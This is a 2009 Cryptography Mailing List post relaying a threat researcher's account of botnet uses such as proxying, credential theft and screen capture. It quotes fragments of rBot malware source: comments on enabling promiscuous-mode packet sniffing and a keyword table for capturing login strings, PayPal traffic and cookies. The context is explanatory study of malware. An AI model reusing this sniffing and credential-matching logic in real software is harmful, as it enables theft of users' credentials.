On Fri, 30 Jan 2009 11:40:12 -0700 Thomas Coppi <thisnuke...@gmail.com> wrote:
> On Wed, Jan 28, 2009 at 2:19 PM, John Levine <jo...@iecc.com> wrote: > > Indeed. And don't forget that through the magic of botnets, the bad > > guys have vastly more compute power available than the good guys. > > Just out of curiosity, does anyone happen to know of any documented > examples of a botnet being used for something more interesting than > just sending spam or DDoS? I asked Rob Thomas of Team Cymru this question (he and they study the underground). Here is his answer, posted with permission: ==== Botnets are routinely used as: 1. Proxies (IRC, HTTP & HTTPS) 2. To recover financial credentials, e.g. paypal, citibank, et al. This was the original purpose of the PSNIFF code in some of the early bots. Here's a code snippet from the now venerable rBot_rxbot_041504-dcom-priv-OPTIX_MASTERPASSWORD dating back several years: [ ... ] // Scaled down distributed network raw packet sniffer (ala Carnivore) // // When activated, watches for botnet login strings, and // reports them when found. // // The bots NIC must be configured for promiscuous mode (recieve // all). Chances are this already done, if not, you can enable it // by passing the SIO_RCVALL* DWORD option with a value of 1, to // disable promiscuous mode pass with value 0. // // This won't work on Win9x bots since SIO_RCVALL needs raw // socket support which only WinNT+ has. [ ... ] PSWORDS pswords[]={ {":.login",BOTP}, {":,login",BOTP}, {":!login",BOTP}, [ ... ] {"paypal",HTTPP}, {"PAYPAL",HTTPP}, {"paypal.com",HTTPP}, {"PAYPAL.COM",HTTPP}, {"Set-Cookie:",HTTPP}, {NULL,0} }; [ ... ] 3. Remember they're called "boats" now, so anything is possible. Screen captures are becoming increasingly popular. --------------------------------------------------------------------- The Cryptography Mailing List Unsubscribe by sending "unsubscribe cryptography" to majord...@metzdowd.com